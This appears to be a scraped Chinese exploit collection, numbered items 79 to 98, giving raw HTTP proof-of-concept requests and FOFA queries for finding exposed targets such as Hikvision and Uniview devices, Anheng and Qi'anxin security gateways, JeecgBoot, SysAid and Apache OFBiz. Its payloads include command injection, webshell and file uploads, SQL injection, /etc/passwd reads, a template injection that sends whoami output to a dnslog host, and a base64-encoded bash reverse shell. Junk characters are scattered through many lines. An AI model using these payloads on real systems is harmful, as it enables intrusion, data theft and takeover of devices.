/Applications/SkillDevelopAndEHS/
: H, Y2 _. N+ W5 K: e$ |, Z+ u( V------YsOxWxSvj1KyZow1PTsh98fdu6l--) N% B* T7 y) i+ m( _8 r2 `( S
7 l- M3 d2 M0 d5 G: z
( {, [1 x9 b' k& |) bGET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.14 G2 G; [5 ]) E6 }
Host: x.x.x.x
* n" W. u0 Q; j) M4 b* G! I! k U) h3 a+ ~
/ w+ V+ T- Z3 K7 b, D, P* B- Z
79. BYTEVALUE 百为流控路由器远程命令执行
8 W" E1 a2 Z9 t7 CFOFA:BYTEVALUE 智能流控路由器
& k1 y" u: n2 N, [GET /goform/webRead/open/?path=|id HTTP/1.1
% D2 d% l% W- d% S$ `Host:IP
% i9 [6 X' c' w, }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0/ G9 a; {% ^# M9 A& S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8& j# N9 u/ e0 K% K8 H1 q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) J: N! V3 q7 M7 l; N; ZAccept-Encoding: gzip, deflate
' H3 o) y9 B1 oConnection: close
$ a2 V4 G4 q9 Q* Y, @0 i( yUpgrade-Insecure-Requests: 13 o- W- m, o; _) J) q
5 @" v- S4 `' _- {7 O5 R( d
+ J4 E! f, C! M3 W9 A- B8 Y |
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
7 E, H, Y5 M7 p0 V8 v# R7 \FOFA:app="速达软件-公司产品"% X8 S( L5 K: Y5 x
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.11 r9 f+ _; r! @+ B
Host: x.x.x.x6 \8 L4 i# l V1 L5 ?/ I. n" i% M
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
" x% B, }& ?' l" YContent-Length: 27
" ~& G; O5 ?* @' V+ ~7 X- ]Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8# p+ w+ i$ Q' S4 S# T2 O
Accept-Encoding: gzip, deflate
& |9 K* c. i' R- vAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 o+ h1 B5 d$ f$ @4 }Connection: close
8 ~, U$ D6 w; n# c+ L; xContent-Type: application/octet-stream
0 [( X: ^! J- ]2 D7 S( y$ rUpgrade-Insecure-Requests: 1" v8 p0 d! L! e3 }1 L8 C# P
) `9 ?. [# j7 [9 W' L<% out.print("oessqeonylzaf");%>
$ ^& l6 T D9 y& B9 B7 N6 s9 _2 T% i' l/ N! ^. P3 Q
; Q7 U' h# ^6 o4 l2 TGET /xykqmfxpoas.jsp HTTP/1.1
! y; O& n: S1 J- Z) X4 x7 oHost: x.x.x.x
2 U, D5 W: u& q& o- X) M3 B9 A' y& sUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
% X3 M3 z' A3 y' ~Connection: close
7 |7 M. ^% l) r. k- JAccept-Encoding: gzip
6 u8 }1 b) q& C8 C- c L
: f& x1 w7 A5 T2 r i: p& z4 G
/ ~: Y. @$ @/ R: X81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露0 \) F ^( m3 d. [& N* F6 z
FOFA:app="uniview-视频监控"
# g) n, `+ b- y+ @6 b5 oGET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
6 X1 N" y3 [: ?6 s0 M5 X' jHost: x.x.x.x
; O: j" i+ f( C/ `; \User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
' C; w" W0 ^ z K& NConnection: close
& ? j4 d, l& r4 ~( \& |3 nAccept-Encoding: gzip/ g, r# h/ ^; k. W/ j' E
& k2 k: M* S) ? y: V5 }# x
/ S! w( J+ ?4 d% T8 I" |. _6 F1 b+ k82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
4 \7 ]) |; J+ ]( c" ]. @0 HFOFA:app="思福迪-LOGBASE"
# s- u6 q# C; V' b" D# ^POST /bhost/test_qrcode_b HTTP/1.1 ]6 }4 g% ^$ f7 B# e5 H6 z5 t
Host: BaseURL
$ b* P: C& m( v# @; yUser-Agent: Go-http-client/1.1" P0 V! Q( y- Y0 _) T% B
Content-Length: 23
5 }) L9 u2 }0 m7 N. S8 IAccept-Encoding: gzip
) H- F/ _& p& f! i1 }/ uConnection: close' A" W( S. g/ _* z. [
Content-Type: application/x-www-form-urlencoded$ q: X0 c/ ?) n- n0 C* D. y
Referer: BaseURL0 E5 g: p H- [- q8 ?
5 R b% v# T4 N; H8 o# V6 Lz1=1&z2="|id;"&z3=bhost
+ F6 ]6 z4 K! z. M% l9 u* E6 f8 y) M! m" B
0 C/ Y: ]$ v5 @' X/ C# i
83. JeecgBoot testConnection 远程命令执行
* }( ?+ Q' k8 s3 {/ C+ X9 MFOFA:title=="JeecgBoot 企业级低代码平台"9 K% a. U# P5 i! n d7 R: \
# P+ Q, L/ o0 S- F$ H+ O0 H! Y
: W: R H* W4 oPOST /jmreport/testConnection HTTP/1.19 f, H6 q! I( e9 a& @
Host: x.x.x.x
% t6 ]( j0 d) Y$ o; B2 t" u, j8 qUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
8 Q7 J9 x* `0 ?" XConnection: close
5 c% `+ H: V3 P! S3 w {( YContent-Length: 8881! W4 [; B; j' x2 U% A3 L
Accept-Encoding: gzip
; G5 U0 E2 F0 G) i! h# }Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"- m- j2 f* Y1 y+ C8 t/ I
Content-Type: application/json
9 G- [$ Q) l9 d- l! i, C/ f5 V7 Y5 d$ |. \$ a
PAYLOAD- A6 U; ^7 x' _" _' u* E4 i0 P
$ s2 j3 P3 N# H, ^
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
: b% K; }" g7 ?3 o( _FOFA:title=="JeecgBoot 企业级低代码平台"% O' @2 d- W$ j7 v
$ b- t1 ^, q7 k: ~, s2 d4 o
: Y V, w4 O9 `" k0 V% M. z4 j1 B7 z- J6 b7 T1 c2 Y
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.15 m0 g2 B7 Z6 z/ x8 ~4 Z, L7 N, k( e
Host: 192.168.40.130:8080
- v1 Z' m) l' c+ K+ Z0 o9 gUser-Agent: curl/7.88.15 |) v+ v$ ^ o! f
Content-Length: 156/ i) C% \" K+ \2 U* S" ?' v$ p1 n
Accept: */*
0 ?8 _; U4 n, R' V7 EConnection: close
0 p' t6 L4 h" |; D2 lContent-Type: application/json
; Q8 n4 x: h' BAccept-Encoding: gzip& z. b- k; K: M+ I$ K! y
/ ^* S, t2 a6 R. ]6 ?2 @{
. T( E. C/ ]9 B" f% i "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
& x( E8 u( A3 V "type": "0"
" \& [4 `# O# C' R}
4 u1 |2 `7 ^* }: @& w. H& E9 a! ~$ n: |: n9 s& K7 ~ `
; d- `* n q8 C( V85. SysAid On-premise< 23.3.36远程代码执行1 {# u9 h4 L9 D. @* c! M: v: U
CVE-2023-47246) q' `! p' e. s; l7 G
FOFA:body="sysaid-logo-dark-green.png"
% G6 l' e+ b r. e0 {, G" EEXP数据包如下,注入哥斯拉马
& I: H. b' Y1 }9 d5 DPOST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
8 d, d/ H3 }6 E- ~Host: x.x.x.x
% |9 U1 D" R; M( e8 v$ HUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15" n$ ^4 _; p' l3 s" k8 X- ?
Content-Type: application/octet-stream# P+ |5 A* t( m1 _; G- x
Accept-Encoding: gzip6 W! r; P5 J4 f- h) i I* K9 u
- E* Y; g* V% B' _
PAYLOAD8 t% c( ]4 e* `- n
$ L! X, ?* Z2 i. m O- b
回显URL:http://x.x.x.x/userfiles/index.jsp. L7 }- C0 y) y9 x# P
$ u2 ~( D+ `) t. R" K
86. 日本tosei自助洗衣机RCE, f% W! S {1 ]+ K9 j5 O+ ^$ k
FOFA:body="tosei_login_check.php"
+ ~# {- F# P3 ^2 r- LPOST /cgi-bin/network_test.php HTTP/1.1
- I) C2 b6 l) s+ H1 V" d" JHost: x.x.x.x9 h. a5 b; K& B- C4 K+ N& }
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36) L* \! ~* \% ^) g% d
Connection: close
! b1 ~$ V5 U" }3 I/ E2 M( X6 iContent-Length: 44) V. ~# Q1 Z; N) s1 D" ^/ x
Accept: */*
3 o5 ?% ~; Z: [: N! HAccept-Encoding: gzip
: x, m* j( G: y$ ]. q5 HAccept-Language: en
* T. D# B1 Q* s8 d7 _Content-Type: application/x-www-form-urlencoded
) j. j5 e7 n3 k2 p% L# l% B( p4 M% T( b4 X; Q8 A1 J
host=%0acat${IFS}/etc/passwd%0a&command=ping! _$ N5 p0 w" `% A' v( D2 q/ W
; n K6 F; i N S( D2 Q
5 O) y$ z2 p7 X% x/ G0 T$ [* Z- [
87. 安恒明御安全网关aaa_local_web_preview文件上传1 \+ Z- W$ v2 w0 j% S3 P
FOFA:title="明御安全网关"1 n9 E" M" V9 C
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
, U: F3 ?1 d. d6 h- A% ~3 a/ D/ \Host: X.X.X.X; x6 J- @/ L: }5 B4 t* G+ C9 M: @
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.159 V8 F3 F7 E9 c, [
Connection: close
! |1 O8 z5 V, `( Q+ OContent-Length: 198
( K9 y0 ]& ^ b: o, a \+ aAccept-Encoding: gzip
8 v' p2 q7 N: sContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd5 K* B2 N0 f. o+ x6 j" F( V5 K
% v t1 R0 n1 T! Z* f
--qqobiandqgawlxodfiisporjwravxtvd: |0 U" }, n/ `
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
( f$ B8 x: B+ m) o) E- a. g' o' yContent-Type: text/plain
! g% v0 v0 n1 s. q6 v8 V9 N% T: a1 |% f2 u
2ZqGNnsjzzU2GBBPyd8AIA7QlDq
. x) c) K2 ~- {# Q" P--qqobiandqgawlxodfiisporjwravxtvd--
; H5 y' U3 ~- h% W0 o, C/ e- Z
& U! N7 S8 W1 k6 [
! r! f) A8 J: L! h" _* a7 a3 \* O/ h3 |/jfhatuwe.php
* k3 P9 X% y( f( A( X& e
6 P( b% G% k$ u9 Q. @88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行) ~% ~; D7 e+ |7 z
FOFA:title="明御安全网关"
& _7 r0 k6 u& m) i5 P4 YGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1% H9 n) [9 J1 Z9 s5 m
Host: x.x.x.xx.x.x.x0 ^2 |/ n$ W0 x* J6 ^$ \. n7 A* L. E
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.151 S. [9 e+ R' \+ Y' u4 k1 l" k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
' |( R( o0 j, e: I4 N3 L" @Accept-Encoding: gzip, deflate
/ |# k! Z6 K( C+ tAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; p5 k1 d. l/ [1 q) O! |8 Q& hConnection: close- m5 `7 w/ o" ^
9 j3 `) }0 L. s# y, f& Q) f" z. ^! P4 x6 A: b |
/astdfkhl.php$ j" C) ]& F! }1 I+ A! y: {' Q) q
" c3 s) W: w; c" X! I }# ?
89. 致远互联FE协作办公平台editflow_manager存在sql注入, T9 Y- b" e' t6 [3 f
FOFA:title="FE协作办公平台" || body="li_plugins_download"2 A5 R/ y8 _8 V+ U: t! U! Y
POST /sysform/003/editflow_manager.js%70 HTTP/1.1) k9 a9 o @6 o1 q5 j. d
Host: x.x.x.x) O& r- u O' m& C& s
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.156 b9 n3 ?2 f% j; T7 a( S) f0 U
Connection: close
" L4 @- F9 x4 U1 ZContent-Length: 41
8 s9 U3 b7 o' [4 r9 jContent-Type: application/x-www-form-urlencoded* ~( P" Y/ Y L. U
Accept-Encoding: gzip
\/ s; t" Y2 Q9 {: X4 M. R
. d' c' R) \' r# e& ~8 qoption=2&GUID=-1'+union+select+111*222--+* l$ H' C3 [( i& A
# ?. H- w, w' `
9 ~/ F3 a/ D0 T- j
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
K* p0 D A4 r$ Z# \FOFA:icon_hash="-1830859634"
, Y9 {8 j4 u) s. D) y7 cPOST /php/ping.php HTTP/1.1
5 z5 R8 X$ m; Y" F _; k/ EHost: x.x.x.x0 d( h8 j% Z1 u# z7 c0 \+ t( q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0 F: W' g( w4 q
Content-Length: 511 n, F+ x) Z4 L! v, @
Accept: application/json, text/javascript, */*; q=0.01: T; f2 y) D+ _0 M
Accept-Encoding: gzip, deflate
, }6 l! R( x6 _) p6 l IAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: {1 Z( |- a7 R2 k2 zConnection: close- S: y$ ]8 h( R& h& Q z5 Y
Content-Type: application/x-www-form-urlencoded8 T. Y- j7 b# Q1 d( Z$ B0 B$ g! s
X-Requested-With: XMLHttpRequest
# m* W( t/ i5 I. m H' S# y' ]( @; N% w p4 f+ x0 O6 t
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
8 m9 \9 C: C2 H6 }8 d0 y1 C" C& M, X3 T; s2 ^
* A6 c3 X5 t* P91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取, h2 y9 M3 t; ^8 i
FOFA:title="综合安防管理平台"
7 i. p- w* o0 p( XGET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1) U! R: n: ~* N. V* j0 w; c
Host: your-ip
/ I$ ?) i. X3 l, {- eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
* Y. V) s; f9 y' O4 vAccept-Encoding: gzip, deflate
0 Z* U+ l4 ]0 W9 KAccept: */*; Q+ a! x0 }- f* d7 @3 T7 j; N
Connection: keep-alive" P! Z3 n- \( X' ^4 i; L5 y; m
! B1 u) ^% k$ G1 S
$ E4 G4 ~& D! j/ o; U: }6 U# f# s7 w* D8 x4 S
92. 海康威视运行管理中心session命令执行
8 Y3 A3 Z2 {& U! }& f3 K% IFastjson命令执行1 E" }6 Q/ M6 I9 S5 s4 M" I4 v
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
2 a, \' a# G. W. m0 Y' LPOST /center/api/session HTTP/1.1
& T5 U$ n' M( a/ R/ WHost:
& `6 f# f' f$ K7 ]3 l' tAccept: application/json, text/plain, */*
! e& n; ^' b" [Accept-Encoding: gzip, deflate7 T2 a2 F; o* r$ D# k: q
X-Requested-With: XMLHttpRequest
0 j* j& U4 {2 _& O5 j) j. j; aContent-Type: application/json;charset=UTF-8. N- O0 P. g* ]# k8 J4 ~
X-Language-Type: zh_CN
# M- w* G( Q; ?+ tTestcmd: echo test
7 R" p9 Z- P' ~' vUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
$ F# V& Q1 X6 W$ o2 @! O# q3 tAccept-Language: zh-CN,zh;q=0.9
# Q. p9 b {/ Q6 f; G1 RContent-Length: 5778, `+ z, j0 X+ E5 J+ ]2 Y u$ u' }
& Y( [& e9 w' a: u1 fPAYLOAD
4 H& `* o+ d- i, a2 ?: U2 I1 e- m: u1 V$ B
% }- D! J/ ^5 M1 k; I9 v; i4 ?
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
) }; J$ B8 M( M; OFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
8 d! l6 u0 N! f1 }- ?POST /?g=app_av_import_save HTTP/1.1
' c& K5 R, \2 \/ Y7 iHost: x.x.x.x) V( S; z$ j# V: R& s
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
7 {; U/ o6 w% k! L. T4 [2 oUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36' X2 e8 q' c$ g! X& j; w
+ O% n9 i" F8 o' |, U
------WebKitFormBoundarykcbkgdfx
0 B9 v4 g2 U! J# iContent-Disposition: form-data; name="MAX_FILE_SIZE"! k5 T7 N2 f% T: L
' |) l9 r D8 K4 }* w& s10000000
) P" |1 U5 X _------WebKitFormBoundarykcbkgdfx4 I3 a; S6 U2 d) ^
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"3 G: p% n. d$ B; w; g
Content-Type: text/plain
" ^8 U. U( z6 l, {
; K1 L9 ?4 C' N* |wagletqrkwrddkthtulxsqrphulnknxa9 D5 u* q9 w$ `) ^! d5 C$ u7 [
------WebKitFormBoundarykcbkgdfx% @9 o# c# X* S) L) Q$ G. x
Content-Disposition: form-data; name="submit_post"
* A" s2 q$ l' R* O0 y+ V3 E: o" b# b# y. g
obj_app_upfile' x' t) X, E6 s6 v/ m/ ?! [* [2 F
------WebKitFormBoundarykcbkgdfx
4 ?5 K1 z2 N' K( T L( XContent-Disposition: form-data; name="__hash__"7 g* C$ \1 r' f3 L3 h
1 d4 S* d( K* x5 W
0b9d6b1ab7479ab69d9f71b05e0e94459 z' E4 _' |; w' Q
------WebKitFormBoundarykcbkgdfx--
1 {& Q* e0 S0 s# J* x" |/ I; ]# J3 [6 W
, [5 I2 R" M, x/ t* X1 B2 q/ L/ tGET /attachements/xlskxknxa.txt HTTP/1.15 [0 [( o7 N. `/ G0 s7 M* @: f4 I
Host: xx.xx.xx.xx# U( S, U! ?) J- ^) F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 y1 k2 B I0 H# D7 g: X9 N
* A* ?# s& [* W% i4 [% b+ K7 l
8 i* Z/ q6 U& }: l3 D* G7 n94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
/ B* U# I6 j) ^3 f) D: BFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="( q. t, c5 h5 G# D% T$ a ^
POST /?g=obj_area_import_save HTTP/1.1
4 p! ^( {& \5 T8 c8 ]Host: x.x.x.x
) R. W; n" E, n! L+ E2 C# jContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt, Z7 v5 ]! z, I0 _ O# L- y5 T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36: Y- _% E1 b5 r# `: j/ [( [
% e ^) \$ F4 d1 j3 z- V, u* @------WebKitFormBoundarybqvzqvmt
' C. c9 H3 c+ k: M# xContent-Disposition: form-data; name="MAX_FILE_SIZE"
( |9 ~8 O/ E. E' Y; e7 x' W2 ? p. }5 e3 l0 h* V
10000000# P/ n) M7 h& b7 m6 K T
------WebKitFormBoundarybqvzqvmt
) `/ M. L$ m* l( O8 I% dContent-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
# j+ U2 G! q: Q7 n; k( eContent-Type: text/plain
4 z, r0 {3 k- e$ `# Q2 R% f
6 w" v, [9 p& b/ g0 {8 J0 _pxplitttsrjnyoafavcajwkvhxindhmu% r/ @: D; `" Z% h! Z
------WebKitFormBoundarybqvzqvmt
Z! }! P2 O; G& u$ g nContent-Disposition: form-data; name="submit_post"
( J, Q% T: k! }
& I0 ~5 c& ^9 s% s$ i! O% B: E' Zobj_app_upfile
8 { l2 [2 q/ z$ D; ~; q------WebKitFormBoundarybqvzqvmt
& a& s+ @$ o6 K* u( I7 YContent-Disposition: form-data; name="__hash__"
- J. [9 V1 f. u9 \. ?* u- I) \* \) l$ t& M8 v( y
0b9d6b1ab7479ab69d9f71b05e0e9445$ I6 F" @* n" Y7 Z# g; W) M2 C% h
------WebKitFormBoundarybqvzqvmt--
( L- W( z9 W8 n0 G& B9 h" Q; ~1 N. ?! Z6 G
/ P; k! q4 N# I2 q1 h4 W) J3 I7 {- N3 ?
GET /attachements/xlskxknxa.txt HTTP/1.1
% J9 H2 O* K. M# L* F. oHost: xx.xx.xx.xx
- x, w: }+ W" E# z( XUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
4 n9 J3 @6 |! O; U5 Y- m0 @
# S, n' f* e: }( _5 t% _8 D5 ~, a4 k% a% E" F. h7 `- B' @
9 o P; i3 q. q/ T$ Y95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
) p/ \: ]" Z5 h! M% {CVE-2023-49070" _* k7 m. |# l% @" T6 G8 v
FOFA:app="Apache_OFBiz"+ N3 ~; H" F7 L% S6 M
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1: K% A0 j. b% U8 p7 ~
Host: x.x.x.x
4 I8 s' S: a/ q- l( a( y) ~0 ^User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36' D' F. q0 m* P0 N. l! z" T
Connection: close
& f5 |) z/ A( n" UContent-Length: 889* G: a1 ^- A9 y, N& \) m! U
Content-Type: application/xml! d5 l5 D6 G/ V R* ^+ J# M2 W
Accept-Encoding: gzip9 f- w r) s4 y& d
% M* I4 y! A6 D9 G- U c
<?xml version="1.0"?>
9 I* C' p! t/ f4 g9 V+ Y3 f6 P<methodCall>
2 Z5 M8 g2 S5 O7 ^" U& y$ O: H$ a <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
4 O0 g3 }/ C2 \3 a3 b+ L <params>
/ y: p6 M7 a/ _ <param>% `# o4 T" O& h. p# G( C
<value>% M# G# o9 u# h* X# g0 `; r
<struct>2 m; I" ~" a! Q3 f9 N' a+ f3 t9 e
<member>
" Y: {% s( R) X& O5 M <name>test</name>
$ m3 N) Q: K: w2 Z3 l: N <value>
. y. q! x! m1 z' N1 ~! G' r3 d. z) }( ` <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
* W8 }( @. Z: |+ s M0 T </value>
8 @# c( A0 G0 k. V( p* L. g </member>
# m0 S( K' o2 C }3 t </struct>9 |3 l6 {# ?" C0 ` z+ @
</value>3 e* f% s+ f" b
</param>
& |0 @; ^) `$ i/ @# |4 x4 V8 s </params>
# Z. h8 ]; |& u# J, q</methodCall>. J7 T7 |& `5 }0 G- ~4 Z
) M7 V% _/ \# X( D; E- U1 m
! f; ? B" R0 C/ j用ysoserial生成payload
) r& h; v+ q, ]* [7 T+ njava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"" l/ y7 b8 O. V s
7 \/ D6 R) W" b& b. b% Q' o* R" d
' u, a1 k+ n+ a将生成的payload替换到上面的POC
3 i6 t( b5 F2 Q$ O9 K3 v# |POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.17 l% o5 {: K6 c2 O: v+ e) I
Host: 192.168.40.130:8443
4 O$ K& B4 j2 YUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.364 \' Y( |# h+ w* K
Connection: close
+ Z! ~5 }% u$ d: O7 z/ N# HContent-Length: 889 E" v9 u6 U& f2 n
Content-Type: application/xml
4 U( P/ }. C0 u. GAccept-Encoding: gzip9 S4 m0 _# Z3 M- i# V
7 @( n' ~& i5 I5 H# R3 RPAYLOAD
! h# V, A! B: }2 H
0 s) p. A- M0 w) U$ e96. Apache OFBiz 18.12.11 groovy 远程代码执行: r6 z' y9 p- Q& A* F
FOFA:app="Apache_OFBiz"
. ~* u9 U2 A: D1 m2 `3 z' jPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1- b" Y) k) A: d' o( q# ?! h" [4 ^
Host: localhost:8443
* ?$ R9 x6 W7 E) E- K, oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
7 I6 S) s$ T* Y& J; k9 EAccept: */*
9 P# [* j. z4 d- gAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: Y9 C$ g2 M& h/ q
Content-Type: application/x-www-form-urlencoded
% `& U% @% h# f2 o4 ~: j8 wContent-Length: 55' i3 z# c1 T) I0 U7 D1 |
) B( Z5 b; R+ P1 A+ \% E1 OgroovyProgram=throw+new+Exception('id'.execute().text);
3 i. e2 C8 z5 R) S& r1 t# ]* M
4 D4 V! a7 Z1 S2 {" K" [% Z2 N' F) l* Y* @, N6 P. k8 m
反弹shell! q t$ i& H4 G( i
在kali上启动一个监听/ E2 x! f* ?% Y1 M( B! ~) }- W
nc -lvp 7777& c# M6 Z. u/ L+ `* t2 ~ `" b
$ V2 S7 M, b H/ aPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
8 C d6 |6 G* Q( O& lHost: 192.168.40.130:84431 k" R( i; {4 [8 u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
7 y! n6 N. H e- iAccept: */*
0 A# E( Q* H g4 [& e- V1 d7 @* R, _Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. V* t1 d; _3 ^% g0 Y
Content-Type: application/x-www-form-urlencoded! e: @, e4 f, {6 D% f7 G
Content-Length: 713 ^# L1 I# V! ^0 [' K" X
7 Z/ Q, j- [( e: A; y1 S, v; @groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
; R, u1 c6 T4 D% j+ ]% ~* E& z" l7 s+ z- n* o1 d4 m
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行* o6 c t5 [+ A, I
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"- \6 Q$ {8 R1 r
GET /passport/login/ HTTP/1.1
: t4 J) k K! _ THost: 192.168.40.130:8085
. p5 F2 y% L: y) `User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15. e: R% y8 h9 J7 ^7 W P, L5 b
Accept-Encoding: gzip2 e. B2 y! }+ v2 i) n6 c Z; v
Connection: close/ |$ T, q/ C+ ~5 t( r0 k& g- Q! {
Cookie: rememberMe=PAYLOAD
% ~* J6 D5 k* zX-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"3 N+ ^8 {: A+ y+ R( A
, E8 ]7 ?; N; r+ M
& X$ s- Q; h2 O" Z1 S8 U98. SpiderFlow爬虫平台远程命令执行
6 x$ k: Q! u, K5 ]/ x* ^CVE-2024-0195
- O4 \0 W) a0 O6 P4 O! IFOFA:app="SpiderFlow"0 F1 b4 R0 i2 _1 ], T" H
POST /function/save HTTP/1.1
2 p# H9 e; H" e+ UHost: 192.168.40.130:8088. Q. L6 S' L2 x' y" m% \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0' v t, d0 X& a& L# c- [% M
Connection: close
! x @6 o' p/ ]Content-Length: 121: }. _! ?( l! M
Accept: */*" j" A; A$ f! D0 u8 q
Accept-Encoding: gzip, deflate
